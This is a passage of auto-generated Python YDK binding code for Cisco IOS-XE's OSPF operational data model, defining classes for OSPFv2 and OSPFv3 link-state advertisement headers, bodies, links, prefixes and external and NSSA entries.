**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): """ Router LSA link .. attribute:: link_id (key) Link ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_data (key) Link data **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: ospfv2_topology Topology specific information **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): """ Topology specific information .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): """ Summary LSA .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): """ External LSA .. attribute:: mt_id (key) MT\-ID for topology enabled on the link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. 
attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv3Lsa(Entity): """ OSPFv3 LSA .. attribute:: header Decoded OSPFv3 LSA header **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header>` **config**\: False .. 
attribute:: lsa_body Decoded OSPFv3 LSA body **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__() self.yang_name = "ospfv3-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv3 LSA header .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. 
attribute:: lsa_header LSA header **type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader>` **config**\: False .. attribute:: lsa_hdr_options OSPFv3 LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): """ LSA header .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. 
attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): """ Decoded OSPFv3 LSA body .. attribute:: network OSPFv3 network **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network>` **config**\: False .. attribute:: prefix OSPFv3 inter area prefix **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix>` **config**\: False .. attribute:: ia_router OSPFv3 inter area router **type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter>` **config**\: False .. 
attribute:: lsa_external OSPFv3 LSA external **type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal>` **config**\: False .. attribute:: nssa OSPFv3 NSSA **type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa>` **config**\: False .. attribute:: link_data OSPFv3 Link data **type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData>` **config**\: False .. attribute:: ia_prefix OSPFv3 Intra area prefixes **type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix>` **config**\: False .. attribute:: lsa_flag_options LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False .. 
attribute:: lsa_body_flags LSA Body Flags **type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = 
OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): """ OSPFv3 network .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False .. 
attribute:: lsa_net_options Network LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): """ OSPFv3 inter area prefix .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ia_prefix Inter area Prefix **type**\: str **config**\: False .. 
attribute:: ia_prefix_options Inter area prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): """ OSPFv3 inter area router .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: destination_router_id Router ID of the router being described by the LSA **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: lsa_ia_options Inter area LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): """ OSPFv3 LSA external .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. 
attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None 
self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): """ OSPFv3 NSSA .. 
attribute:: lsa_nssa_external NSSA LSA **type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): """ NSSA LSA .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. 
